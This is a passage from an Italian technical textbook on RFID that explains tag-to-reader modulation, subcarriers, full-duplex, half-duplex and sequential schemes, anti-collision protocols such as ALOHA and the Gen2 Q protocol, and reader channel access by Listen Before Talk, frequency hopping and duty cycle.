dovrebbe leggere una pallet contenente 200 TAG, in un secondo.Per fare ciò, considerando che il singolo TAG interrogato, trasmette

circa 100 bit, 200 TAG/s generano un flusso di dati minimo di 20kbps.Sebbene vi siano numerose metodologie in uso per gestire in maniera

efficiente le comunicazioni tra i Reader ed i TAG, le modulazioni diampiezza nella banda UHF consentono di ottenere un bitrate nell’inter-vallo 16-80 kbps, un numero di bit letti per ogni TAG dell’ordine di 100-200 bit e un numero di letture di 50-800 TAG per secondo. Molti prodot-ti prevedono due o più possibili velocità dei dati.È improbabile trovare prodotti al di fuori di tale intervallo operativo

dato che non sarebbero utilizzabili da nessuna applicazione.

MODULAZIONE TAG =>READER

Ricordando che il TAG non è equipaggiato con un trasmettitore ma silimita a modulare il carico (nell’accoppiamento induttivo) o il backscatter,va rilevato che entrambe queste tecniche permettono la variazione inampiezza o in fase della portante re-irradiata, in dipendenza della loroimplementazione.Come conseguenza del livello estremamente basso del segnale modula-

to dal TAG relativamente a quello emesso dal Reader, si verificano difficol-tà nella ricezione del segnale da parte di quest’ultimo. I due segnali infat-ti, quello del Reader e quello del TAG, avrebbero la stessa frequenza.Per consentire al Reader di rilevare più agevolmente il segnale del TAG

viene spesso usata, nel processo di modulazione del TAG, una sottoportan-te che sposta lo spettro del segnale modulato dal TAG lontano dalla frequen-za della portante (generata dal Reader). Questa sottoportante è rilevabile conmaggior facilità dal Reader medesimo attraverso opportuno filtraggio.Ricordando che le tecniche di codifica dei dati adottate dal TAG deter-

minano anche lo spettro di frequenza del segnale di risposta, per creareuna sottoportante, la modulazione (tramite variazione del carico o back-

IV.2.4

2-parteIV.qxp:rfid 5-09-2008 10:57 Pagina 213

Page 205: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva214

scattering) viene operata ad una frequenza più elevata del data rate nomi-nale derivante dalla codifica di linea.In pratica, l’accorgimento utilizzato è quello di incrementare di un fat-

tore M (ad esempio M=2, 4, 8) il numero di transizioni nell’ambito del-l’intervallo di tempo dedicato alla trasmissione del simbolo codificato[EPCGlobal Gen2, Class 1]. In tal modo si introduce nel segnale di rispo-sta una componente frequenziale (sottoportante) progressivamente piùdistante dalla portante al crescere del fattore M, intorno alla quale si con-centra lo spettro del segnale modulante.L’informazione viene quindi modulata nella banda laterale di una sot-

toportante a frequenza più alta di quella della portante d’interrogazionedel Reader.

La Figura IV.8 illustra un tipica situazione spesso utilizzata nei sistemi HFche operano a 13,56 MHz ed usano una sottoportante distante 212 kHz.Questo accorgimento sposta le bande laterali associate alla modulazio-ne operata dal TAG di 212 kHz sopra e sotto la frequenza portante di13,56 MHz consentendo così una più agevole ricezione da parte delReader.Poiché però la maggior parte dei segnali di backscatter sono a livello

relativamente basso ciò obbliga il Reader ad emettere un tono molto puli-to in modo da non interferire con le risposte del TAG. Inoltre, per gene-rare la sottoportante, il TAG deve essere dotato di un oscillatore locale o

Figura IV.8Spettri dei segnali di un sistema HF a 13,56MHz e sottoportante distante 212 kHz [4]

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 214

Page 206: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID215

comunque di una temporizzazione più veloce di quella ricavabile dalsegnale ricevuto.Per quanto riguarda invece la banda occupata dal segnale di risposta

dal TAG verso il Reader è da notare che il backscatter non si mantieneconfinato nell’ampiezza di banda del segnale emesso dal Reader. Le emis-sioni del TAG tuttavia non costituiscono un parametro critico, in quantoil livello del segnale è così basso da essere considerato (non incorrere)nelle prescrizioni normative per la larghezza di banda ai fini delle interfe-renze dei segnali radio.

2.4.1 Risposte dei TAG (in banda e fuori banda)

Come descritto in precedenza, la risposta dei TAG passivi all’interroga-zione del Reader si basa su opportuna “modulazione” della riflessione(backscatter) del segnale ricevuto. La potenza disponibile per essere ritra-smessa al Reader risulta quindi estremamente ridotta e conseguentemen-te il livello del segnale di risposta è più simile al rumore di fondo che aquello del segnale emesso dal Reader.Da tale punto di vista i differenti metodi di modulazione utilizzati pos-

sono essere classificati a seconda che i segnali di risposta siano o menonella stessa banda del segnale ricevuto:- tecniche in banda; in cui la variazione del carico o il backscatter inte-ressano direttamente la frequenza portante emessa dal Reader.

- tecniche fuori banda; in cui la variazione del carico o il backscatterinteressano una sottoportante, generata dal TAG, che si discosta dallaportante emessa dal Reader.Una problematica delle tecniche in banda è che il Reader ed il TAG

non possono trasmettere dati contemporaneamente. Durante la trasmis-sione del TAG, infatti, il Reader deve inviare una frequenza non modula-ta al solo scopo di alimentare il TAG medesimo (HDX) oppure il TAGdeve sfruttare energia accumulata (SEQ) (cfr.§IV.2.4.2). Inoltre vi è unperiodo di tempo necessario affinché il sistema transiti dallo stato in cuitrasmette il Reader e quello in cui trasmette il TAG e viceversa.Da ultimo, per confinare la risposta dei TAG nella banda di lavoro, la

velocità dei dati trasmessi dal TAG deve essere mantenuta approssimati-

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 215

Page 207: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva216

vamente uguale alla velocità del Reader e quindi relativamente bassa.Questa caratteristica è realizzata tipicamente con una codifica digitale inbanda base che risulta essere meno robusta al rumore rispetto a tecnichealternative.Ricordando che le emissioni dei TAG possiedono livelli di potenza

estremamente bassi, l’uso delle tecniche fuori banda determina indubbivantaggi nella progettazione di un sistema RFID; Reader e TAG, infatti,possono trasmettere dati contemporaneamente (FDX). In tal modo si rea-lizza un sistema full duplex eliminando anche i periodi di tempo necessa-ri al sistema per invertire il senso della trasmissione. E’ inoltre possibileutilizzare nel Reader trasmettitori meno precisi e quindi meno costosi inquanto il rumore “in banda” influisce poco sulla ricezione del segnale dibackscatter. Infine, migliorando il rapporto segnale/rumore, un Readerpuò ricevere segnali di backscatter da TAG disposti a distanze più eleva-te rispetto a quelle ottenibili da sistemi con risposta in banda.In conclusione si può affermare che le metodologie di risposta di back-

scatter in banda pongono ostacoli alla progettazione dei Reader che inve-ce vengono minimizzati nelle tecniche fuori banda.In quest’ultime, però, considerando l’influenza, sugli effetti di interfe-

renza, del livello estremamente basso dei segnali generati dai TAG passi-vi, va valutato l’effetto di eventuali segnali spuri nella banda di ricezionedel Reader e di interferenze che si possono generare da altri sistemi ope-ranti sulle frequenze coinvolte.L’energia di backscatter, infatti, è tipicamente 40-60dB inferiore a quel-

la dell’uscita del Reader e la pala di un ventilatore rotante ad alta velocitàproduce lo stesso livello di backscatter.A conferma di ciò, l’ente di regolamentazione nord americano FCC,

definisce un radiatore passivo come “radiatore non intenzionale”, avendoconstatato la scarsa significatività delle sue emissioni e non richiede test diemissione per i TAG RFID passivi in quanto non significativi.

2.4.2 Sistemi FDX, HDX e SEQ

Da un punto di vista procedurale, la comunicazione e il trasferimento dienergia tra Reader e TAG avvengono secondo uno dei seguenti schemi:

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 216

Page 208: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID217

full duplex (FDX), half duplex (HDX) and sequential (SEQ).- Nel sistema FDX il trasferimento dati dal Reader al TAG (down link)avviene contemporaneamente al trasferimento dati dal TAG al Reader(uplink), mentre il trasferimento di energia dal TAG al Reader è conti-nuo, indipendentemente dal verso di trasferimento dei dati.

- Nel sistema HDX il trasferimento dati dal Reader al TAG (down link)si alterna al trasferimento dati dal TAG al Reader (uplink), mentre iltrasferimento di energia dal TAG al Reader è anche in tal caso conti-nuo (attraverso una portante non modulata), indipendentemente dalverso di trasferimento dei dati.

- Nel sistema SEQ il trasferimento di energia dal Reader al TAG avvie-ne invece (contemporaneamente al trasferimento dati dal Reader alTAG) in periodi temporali determinati, mentre il trasferimento dati dalTAG al Reader avviene negli intervalli intercorrenti tra i precedenti,sfruttando energia accumulata dal TAG.I tre schemi procedurali sono illustrati in Figura IV.9.Risulta evidente che la scelta di uno degli schemi di comunicazione

descritti è vincolata in maniera determinante dalle tecnologie RF utilizza-te. In particolare l’utilizzo di tecniche di comunicazione fuori bandarende possibile la realizzazione di sistemi FDX, che invece è preclusa dal-l’uso di tecniche in banda.

Figura IV.9Procedure di comunicazione nei sistemi RFID

[21]

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 217

Page 209: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva218

COMUNICAZIONE READER <=> TAG

Quando si opera in ambienti con molteplicità di TAG o Reader che ope-rano nello stesso tempo, sorgono i classici problemi di conflitti tra appa-rati nelle comunicazioni wireless.I casi più significativi riguardano l’impiego dei TAG RFID nella gestione

delle merci. In queste applicazioni vengono impiegate grandi quantità diTAG passivi a basso costo ed una molteplicità di Reader, spesso concentratinei medesimi ambienti (magazzini, supermercati, ecc.). Le quantità di TAGtenderanno ad aumentare fino all’ “esplosione” se l’associazione di “etichet-te intelligenti” ai singoli articoli in commercio diverrà una realtà diffusa.Il problema presenta due aspetti speculari:

- Tutti i TAG (in mancanza di apposite procedure) risponderebberocontemporaneamente ad una interrogazione di Reader ricevuta corret-tamente.

- I TAG dovrebbero rispondere a tutti i Reader che li interrogasserocontemporaneamente.Naturalmente in queste condizioni la comunicazione non può avvenire

con successo, pertanto vanno presi provvedimenti affinché nessuno diquesti due casi si verifichi.- La possibilità di risposte multiple e contemporanee da parte di piùTAG che ricevano la stessa interrogazione corrisponde alla circostanzadi diversi TAG presenti nel raggio di azione di uno stesso Reader. Inquesto caso essi replicherebbero alle interrogazioni tutti nello stessomomento. Questo provocherebbe inevitabilmente collisioni e perditedi dati. È quindi necessario implementare nei TAG algoritmi anti col-lisione, in modo che le loro risposte possano essere ordinate temporal-mente e riconosciute individualmente.Il numero di TAG che può essere identificato (nell’unità di tempo)all’interno della distanza operativa di un Reader dipende dal bitrate deiTAG (che dipende anche dalla frequenza operativa) e dal protocolloanticollisione, tipicamente si va da 50 TAG/s per frequenze HF a 200TAG/s per frequenze UHF.Una volta che il singolo TAG è stato identificato, il Reader può indiriz-zarlo singolarmente e compiere operazioni su di esso senza interferire

IV.3

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 218

Page 210: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID219

con i TAG vicini. Tra le operazioni più comuni (se il tipo di TAG lo per-mette) vi è la scrittura di parti della memoria, oppure la predisposizionedel protocollo anti-collisione affinché tenga in standby il TAG per un po’di tempo, onde non interferire con altri TAG non ancora identificati.

- La possibilità di interrogazioni multiple contemporanee da parte di piùReader, in cui il TAG presenta una capacità limitata di rispondere adogni specifica interrogazione. Conseguentemente devono essere attua-te tecniche di sincronizzazione tra Reader affinché non si verifichinointerrogazioni contemporanee in un ambiente in cui sono presenti piùReader.Problemi legati alla disponibilità di banda ed alle potenze impiegatehanno condotto Europa e Stati Uniti a definire due approcci comple-tamente differenti alla sincronizzazione tra Reader. Tali approcci vannosotto il nome di “Listen Bifore Talk - LBT” in Europa e “FrequencyHopping” negli USA.

TECNICHE DI SINCRONIZZAZIONE TRA TAG

3.1.1 Etichette intelligenti ed esplosione dei dati

Un esempio può aiutare a comprendere il problema del volume di datigenerato dalla tecnologia RFID quando, nella gestione delle merci, si arri-vasse all’associazione di “etichette intelligenti” non solo ai contenitori peril trasporto ed agli imballaggi, ma ai singoli articoli in commercio.Si consideri un carico di confezioni di oggetti (zollette di zucchero in

figura) che venga spostato dal produttore al centro di distribuzione ai det-taglianti.Si assuma che:

• Ogni confezione di oggetti sia marcata con etichette RFID.• Un cartone per la spedizione contenga 80 di queste confezioni.• In media, 64 cartoni vengano aggregati in una pallet.• Un lotto di spedizione contenga in media 30 pallet.• Un magazzino contenga 30 lotti di spedizione.Un’interrogazione radio, sull’intero lotto di spedizione, provocherebbe

la risposta di tutti i TAG, con la conseguente necessità di riconoscere più

IV.3.1

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 219

Page 211: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva220

IV.3.2

di 150.000 oggetti distinti. Questo tipo di interrogazione è oggi ai limitidelle possibilità, considerate le potenze permesse (in interrogazione) e lasensibilità dei TAG. Se però, con il progresso tecnologico, si arrivasse aduna interrogazione che provochi la risposta di tutto ciò che è contenutonel magazzino dell’esempio (o, peggio, in un supermercato) si arrivereb-be a 4,5 milioni di risposte contemporanee da gestire. La tecniche studia-te per le comunicazioni wireless (di tutti i tipi) non sono mai giunte adaffrontare questo tipo di problemi.

PROTOCOLLI ANTI COLLISIONE - TECNICHE

Esistono due classi fondamentali di protocolli anti-collisione, derivatidirettamente dalle tecnologie delle wirwless LAN, la classe dei protocollideterministici e quella dei protocolli probabilistici.Nell’ambito dei protocolli che gestiscono le “collisioni” tra trasmissio-

ni simultanee da una molteplicità di TAG, il cosiddetto “Binary DecisionTree” appartiene alla classe dei protocolli deterministici mentre i cosid-detti “ALOHA” e “slotted ALOHA” appartengono alla classe dei proto-colli probabilistici.

Figura IV.10Paradosso dell’esplosione dei dati

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 220

Page 212: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID221

Mentre il protocollo “Binary Decision Tree” è realizzato dal Readerattraverso interrogazioni ripetute dei TAG, i protocolli “ALOHA” e“slotted ALOHA” sono realizzati dai TAG per rispondere ad una inter-rogazione da parte del Reader.Supponendo che il Reader effettui chiamate selettive, il protocollo

“Binary Decision Tree” ha come obiettivo di identificare i TAG aventiidentificatori uguali ad un prefissato numero binario. Ad esempio, tutti iTAG aventi identificatore con la prima cifra uguale ad 1 rispondono aduna prima interrogazione, poi tutti quelli con seconda cifra uguale a 0 ecosì via fino a che ogni TAG abbia risposto per la prima volta. A questopunto il Reader avrà registrato tutti i TAG e compatibilmente con le capa-cità dei TAG il Reader potrà indirizzarli singolarmente. Nel caso si verifi-chino collisioni, cifre addizionali vengono utilizzate nell’interrogazione

Figura IV.11Binary Decision Tree, esempio [7]

Figura IV.12ALOHA, esempio [7]

Figura IV.13Slotted ALOHA, esempio [7]

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 221

Page 213: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva222

relativa a quella particolare porzione dell’albero di decisione. Ad esempiose la chiamata con prima cifra “0” dà collisione si passerà a due chiamatecon cifre “00” e “01”, se anche la chiamata con cifre “01” dà collisione sipasserà a due chiamate con cifre “010” e “011” e via discorrendo fino allarisoluzione di tutti i conflitti. Dalla figura appare evidente l’esplosionedelle dimensioni dell’albero e quindi del numero delle chiamate all’au-mentare del numero dei TAG, conseguentemente i protocolli di questotipo presentano delle prestazioni limitate per quanto riguarda la velocitàdi ricerca degli identificatori dei TAG nell’intero albero.Il protocollo di tipo probabilistico ALOHA (sviluppato dall’Università

delle Hawaii) prevede che il TAG trasmetta il proprio messaggio e se ilmessaggio non va a buon fine il TAG effettua un nuovo tentativo di tra-smissione, autonomamente (dopo avere atteso un certo periodo di tempo)o a seguito di una nuova interrogazione da parte del Reader. I tentativi ditrasmissione proseguono fino a che la trasmissione del messaggio va abuon fine.Il protocollo “slotted ALOHA” prevede invece una sorta di discretiz-

zazione degli istanti in cui i TAG possono iniziare a trasmettere un pac-chetto di dati. Questo comporta che se non vi è collisione nell’istante ini-ziale, il pacchetto sicuramente non subirà collisione durante la sua tra-smissione. Il protocollo “slotted ALOHA” possiede un’efficienza in ter-mini di sfruttamento della banda disponibile di circa il 30% rispetto acirca il 18% dell’ALOHA. I protocolli ALOHA sono relativamente velo-ci nell’identificazione di un particolare TAG nell’ambito di un insiemenumeroso. Inoltre una maggiore efficienza può essere raggiunta con l’im-piego aggiuntivo di tecniche di tipo Listen Before Talk (LBT). Questeprevedono che il Reader verifichi che il canale di trasmissione sia liberoprima di effettuare un’interrogazione, evitando così di interrompere unatrasmissione in corso.

3.2.1 Protocolli anti collisione - Standard

Gli standard quali ISO/IEC 18000-6 si sono evoluti prendendo in consi-derazione protocolli anticollisione differenti. Inizialmente ISO/IEC18000-6 Type A prevedeva il protocollo ALOHA. Successivamente

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 222

Page 214: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID223

ISO/IEC 18000-6 Type B utilizzava il protocollo “Binary Decision Tree”.Più recentemente ISO/IEC 18000-6 Type C (Gen2) prevede l’uso del pro-tocollo “slotted ALOHA” raggiungendo così un throughput maggiore.Quest’ultimo unifica una serie di precedenti specifiche UHF e fornisce

la flessibilità che consente di aumentare le prestazioni pur mantenendoquel rigore nella specifica che ne garantisce un suo impiego su scala mon-diale. Fornisce quattro differenti velocità di comunicazione consentendoa ciascuna implementazione di ottenere il massimo throughput dal cana-le a disposizione soddisfacendo allo stesso tempo le limitazioni regola-mentari di ciascuna nazione. Il cosiddetto protocollo ‘Q’ contenente ilmeccanismo “slotted ALOHA” è stato ulteriormente ottimizzato neiriguardi della possibilità di leggere TAG che risultano accessibili margi-nalmente nell’area di copertura del Reader. Gli scambi protocollari sonostati ridotti nella loro durata temporale per garantire che i TAG ricevanosufficiente energia da portare a termine la comunicazione. Un particolareparametro ‘Q’ è utilizzato per controllare la probabilità che un TAGrisponda al Reader. I TAG conformi a tale standard sono inoltre in gradodi porsi in uno stato di temporanea inattività (standby) appena dopo esse-re stati letti. In tal modo le collisioni vengono minimizzate e si velocizzala lettura degli altri TAG.

3.2.2 Tecniche avanzate di identificazione in ambiente di Reader multipli

Un parametro essenziale per le prestazioni di un sistema RFID ad altadensità di TAG è velocità di identificazione (singulation rate) ovvero larapidità con la quale un Reader identifica ciascuno dei TAG che ricadenel proprio raggio d’azione.Se la velocità di identificazione è sufficentemente alta, si dovrebbe per-

venire ad una prestazione molto richiesta, consistente nella lettura “inmovimento” delle etichette. Ad esempio prodotti contenuti in una palletin transito su carrello o di bagagli su un nasto trasportatore.In mancanza di protocolli complessi (TAG di prima generazione), la

velocità di identificazione dipende essenzialmente da due fattori: l’effi-cienza del protocollo anticollisione ed il bitrate prodotto dal TAG.Il processo di identificazione nei TAG passivi più moderni (Gen2 nelle

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 223

Page 215: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva224

bande UHF, cfr.§VI.1.7) avviene anche attraverso delle risorse procedu-rali avanzate. Ovvero combinando il protocollo anticollisione (SlottedALOHA) con una tecnica di “selezione” che divida in due parti la popo-lazione dei TAG sulla base di determinate caratteristiche (comando“selection”), limitando di conseguenza il numero di TAG che possonocollidere. Ad esempio si selezionano solo i TAG delle confezioni esclu-dendo quelli dei singoli oggetti contenuti; oppure si divide in due parti(sulla base dell’identificativo) una popolazione troppo numerosa di ogget-ti che potrebbero rispondere. Effettuata la selezione (che non implicarisposte dai TAG) si può passare alle interrogazioni che consentono diclassificare (inventariare) i TAG selezionati (che a questo punto devonorispondere utilizzando il protocollo anticollisione).Altri metodi efficaci consistono nel:

- “mettere a dormire” (put to sleeep) per qualche tempo i TAG chehanno risposto, evitando che interferiscano con la comunicazione versogli altri. Questo modo di operare, però, crea problemi in quando piùReader che operano nella stessa area, non possono sapere se un TAG èstato “silenziato” da un altro Reader.

- Generare delle risposte tronche (truncated reply) da parte dei TAG cherisultino più veloci, trasmettendo solo una parte dell’identificatiovo odell’EPC. Questa tecnica trova impiego in ambienti particolari ovetuttti i TAG appartengano alla stessa partita e posseggano identificati-vi o EPC con parti comuni.Sfruttando queste possibilità i costruttori possono realizzare varie stra-

tegie di identificazione.Inoltre per ridurre i problemi di convivenza di più Reader con la mede-

sima popolazione di TAG, le specifiche Gen2 (cfr.§VI.1.7) adottano unprotocollo in cui è prevista la convivenza di differenti “sessioni” di iden-tificazione (fino ad un massimo di 4). I TAG devono poter gestire ciascu-na sessione in modo indipendente, rispondendo in modo appropriato.Naturalmente, essendo il TAG unico, richieste e risposte relative a diffe-renti sessioni non dovranno collidere temporalmente. Dal lato dei Readerun sistema di gestione che li controlli, assegnerà dinamicamente ciascunReader ad una sessione.

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 224

Page 216: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID225

TECNICHE DI INTERROGAZIONE DEL READER: LISTEN BEFORE TALK VS.FREQUENCY HOPPING

Lo standard ISO/IEC 18000-6 Type C riguarda anche la differenza tra ilivelli di potenza di uplink e di downlink in ambienti in cui sono presentimolteplici Reader. Infatti Reader disposti in vicinanza possono interferiretra loro.Il livello di potenza in downlink generato dall’amplificatore di potenza

di un Reader può raggiungere un valore massimo di +37 dBm negli USA,consentendo ai TAG passivi di ricevere un livello di potenza (trasportatadal segnale RF) utilizzabile maggiore di -15 dBm a circa 4 m di distanza.Il livello di potenza in uplink ricevuto dal Reader (trasmissione in back-scattering dal TAG) può raggiungere un livello di -63 dBm, estremamen-te basso rispetto al livello generato in downlink. Inoltre in ambienti conpresenza di molteplici Reader, altri lettori possono interferire con il segna-le di backscattering ricevuto.

3.3.1 Listen Before Talk & Adaptive Frequency Agility

In Giappone e in Europa la disponibilità di frequenze in banda UHF èscarsa, conseguentemente lo standard ISO/IEC 18000-6 Type C ha pre-visto di ridurre la congestione tramite la sincronizzazione delle interroga-zioni dei Reader in prossimità tramite l’uso di tecniche che consentono dievitare l’impiego di canali già occupati, queste vanno sotto il nome di“Listen Before Talk” – LBT.Nella tecnica LBT il Reader deve ascoltare prima di trasmettere verifi-

cando che altri apparati non stiano già occupando il canale prescelto. Se ilcanale è occupato il Reader deve attendere oppure tentare l’occupazione diun altro canale scelto tra un insieme di canali disponibili nel caso in cui sisia adottata la cosiddetta opzione di “Adaptive Frequency Agility” – AFA.La normativa europea definisce occupato un canale su cui sia presente

un segnale di:• -96 dBm se la potenza dell’interrogazione sia di 2 W• -90 dBm se la potenza dell’interrogazione sia di 500 mW• -83 dBm se la potenza dell’interrogazione sia di 100 mWNell’ambito dell’impiego delle tecniche LBT/AFA, un uso più efficien-

IV.3.3

Figura IV.14Reader portatile legge/scive

etichette intelligentiIP3pro4. - Intermec

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 225

Page 217: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva226

te e mediamente equidistribuito tra i contenden-ti dei canali disponibili viene raggiunto imponen-do un limite sul tempo massimo A in cui ilReader può occupare uno stesso canale e sultempo minimo B che deve attendere prima di

rioccupare lo stesso canale (se disponibile).Per aumentare la capacità del Reader di operare in ambienti con con-

gestione, rumori o interferenze, si può anche prevedere l’uso di uno diquattro differenti rate di codifica per sotto-portante (FM0, Miller M=2,M=4 & M=8) per variare la larghezza di banda del canale.

3.3.2 Frequency Hopping

L’FCC statunitense ha previsto un approccio basato sul salto di frequen-za (“Frequency Hopping”) che consente di ottenere un elevato grado diefficienza. I trasmettitori in contesa non possono occupare una frequenzaper più di un periodo di tempo molto ridotto (meno di mezzo secondo).Tuttavia, al termine di tale periodo di tempo, non devono necessariamen-te spegnersi (come nel caso del “Duty Cycle”) ma sono obbligati a saltaresu una frequenza differente con scelta casuale. L’effetto complessivo è chetale metodo risulta molto efficiente sia nel caso in cui sia presente un soloReader, sia in quello in cui siano presenti più Reader.Nel primo di questi due casi è consentito all’unico Reader presente di

avere un tasso di utilizzazione della banda del 100% fino al completamen-to della sua emissione (che però avviene saltando su frequenze diverse).Nel secondo caso in cui sono presenti più trasmettitori, poiché le frequen-ze sono occupate in maniera casuale l’accesso diventa una questione dimedia probabilistica che si traduce in un’uniforme ripartizione tra tutti itrasmettitori dell’uso delle frequenze e della probabilità di trasmettere suuna frequenza già occupata. In situazione di affollamento un Readercostretto a saltare di frequenza troverà, con probabilità elevata, la nuovafrequenza occupata e sarà costretto a riprovare fino a che non troverà unafrequenza disponibile.Per assicurare buone prestazioni, l’FCC ha definito, per RFID in UHF

media, una banda di 26 MHz divisa in 63 canali. Tuttavia studi condotti

Figura IV.15Intervalli di trasmissione

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 226

Page 218: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID227

anche su pochi canali (4-6), sembrano mettere in evidenza che il modellofornisca prestazioni migliori del modello LBT.La modalità Frequency Hopping non porta a grandi complicazioni sia

sul lato TAG che su quello Reader.- Il TAG, infatti, opera come un riflettore passivo (backscatter) intrinse-camente a larga banda, non risente pertanto dei salti della frequenza diinterrogazione.

- La sezione ricevente del Reader, per parte sua, recepisce automatica-mente ogni cambio di frequenza del segnale emesso, in quanto la con-versione di frequenza nel ricevitore condivide lo stesso oscillatore loca-le del trasmettitore (cfr. Figura II.61).

3.3.3 Occupazione del canale radio: la tecnica del “Duty Cycle”

Le due tecniche di LBT e Frequency Hopping prevedono entrambe delleregole per limitare l’occupazione del singolo canale radio. Queste proce-dure, che limitano il ciclo di lavoro di un trasmettitore su un singolo cana-le vanno sotto il nome di “Duty Cycle”.Nella teoria della codifica dei segnali numerici, il cosiddetto “Duty

Cycle” è definito come il rapporto tra la durata ττ di un impulso ed ilperiodo T del segnale costituito da un treno di impulsi.Nell’ambito della comunicazione tra TAG e Reader, però, con il termi-

ne di “Duty Cycle” si fa essenzialmente riferimento ad una tecnica di con-trollo d’accesso ad un mezzo trasmissivo condiviso che cerca di garantirea tutti i dispositivi contendenti una stessa elevata probabilità di successo.Nel caso particolare l’accesso riguarda l’impegno di una particolare fre-

quenza operativa da parte dei Reader. La tecnicabasata sul “Duty Cycle” prevede che un trasmet-titore possa emettere ininterrottamente per nonpiù di un breve periodo di tempo, al termine delquale dovrà spegnersi per consentire l’accessoalla frequenza da parte di altri trasmettitori inattesa. Per continuare la trasmissione dovràattendere un certo periodo prima di tentare nuo-vamente di accedere alla frequenza. Ad esempio

Figura IV.16“Duty Cycle”

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 227

Page 219: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva228

se è consentito un “Duty Cycle” del 10% su un periodo di un secondo, alReader è consentito di interrogare e leggere TAG per 0,1 s, dopo di che,dovrà restare in silenzio per i rimanenti 0,9 s su quella frequenza. A scopo comparativo è utile comprendere l’impatto che ha l’impiego

della modalità “Duty Cycle” in un sistema RFID.I vincoli introdotti da tale approccio infatti, se da un lato semplificano

la progettazione, dall’altro impongono limiti sull’efficienza operativa delsistema. Il modo “Duty Cycle” tradizionale introduce un periodo di “on”ed un periodo di “off”. In ogni circostanza il periodo di “off” determinala possibilità che alcuni eventi non siano ricevuti e quindi determinano l’i-naffidabilità del sistema per certe applicazioni. Ad esempio, riconsideran-do il “Duty Cycle” del 10% su un periodo di un secondo, di cui si è par-lato, appaiono due problematiche:- Un numero limitato di TAG è letto in 0,1 s. Tenendo conto delle bassevelocità di lettura disponibili, è molto probabile che non si riesca a leg-gere un’intera popolazione di TAG in un periodo così breve. Se talepopolazione risulta in movimento, i TAG non letti possono, con pro-babilità elevata, essere persi in quanto andati fuori dall’area di copertu-ra del Reader dopo i 0,9 s del periodo “off”.

- Anche con una popolazione di pochi TAG in transito veloce (ad esem-pio in applicazioni di raccolta pedaggi), l’approccio “Duty Cycle”lascia una elevata finestra temporale in cui si possono perdere letture diTAG. Questo inficia la robustezza di un’applicazione imponendo il ral-lentamento dei veicoli entro limiti prefissati per evitare l’uscita deiTAG dalla distanza operativa del Reader.Inoltre, estremizzando tale situazione, molti sistemi RFID sono confi-

gurati per leggere uno stesso TAG più volte per incrementare l’affidabili-tà dei dati raccolti. Questo può portare ad estendere la finestra tempora-le nella quale un veicolo deve trovarsi a breve distanza dal Reader (3-6metri) e questo può comportare una velocità di transito troppo bassarispetto a quella usuale dei veicoli.Un’altra situazione estrema è quando sistemi basati su “Duty Cycle”

possiedono un periodo relativamente lungo come ad esempio un’ora.Questo consentirebbe, teoricamente, ad un trasmettitore di occupare una

2-parteIV.qxp:rfid 5-09-2008 10:58 Pagina 228

Page 220: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE IV - CODIFICHE E MODULAZIONI NEI SISTEMI RFID229

frequenza per intervalli temporali di alcuni minuti. Il conseguente bloccodegli altri dispositivi per un periodo così lungo pone seri problemi di affi-dabilità in sistemi real-time come generalmente sono i sistemi RFID.Ovviamente, soluzioni che prevedano periodi troppo lunghi non sonoaccettabili. In fase di progettazione ci si deve orientare verso soluzioni conperiodi piuttosto corti anche se devono essere attentamente valutate tuttele conseguenze di questo tipo di scelte. In ogni caso, tuttavia, l’approccio“Duty Cycle” richiede che un trasmettitore sia inattivo per una certa per-centuale di tempo anche in ambienti in cui è presente un numero ridottodi trasmettitori (al limite uno soltanto). Ciò comporta il mancato pienosfruttamento della capacità della banda di frequenze e rappresenta unapproccio non ottimale se non per ambienti particolari con un numerospecifico di trasmettitori, situazione che costituisce una minima percen-tuale dei sistemi reali.In conclusione, il vincolo imposto dalle soluzioni basate su “Duty

